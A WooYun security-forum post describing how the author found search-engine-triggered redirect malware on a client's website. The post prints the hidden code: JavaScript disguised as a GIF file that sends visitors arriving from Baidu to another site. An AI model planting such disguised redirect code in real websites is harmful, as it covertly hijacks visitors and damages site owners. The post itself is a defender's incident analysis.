当前位置:WooYun(白帽子技术社区) >> 搜索引擎 >> 昨晚找到的一个利用引擎挂马手法
一客户站被挂马,正常打开无症状,通过百度关键字打开就跳转到别的站,第一反应就是web扩展或网站加载文件导致,苦逼似的分析了所有web扩展加载网站程序都看了没异常,停了IIS启用阿帕奇服务,引擎关键字打开一样跳转。看来真出在程序里了。
最后发现了以gif图片,被script调用,记事本打开后发现如下代码:GIF89a="";
var s=document.referrer;
if(s.indexOf("baidu")>0)
{
self.location="http://www.baidu.com/";
//if(parent.window.opener) parent.window.opener.location='http://www.baidu.com/';
}
顿时震精了,清理后网站正常了。感慨现在的挂马方花样越来越多。。
添加新回复
登录 后才能参与评论.
其它内容
- 暂无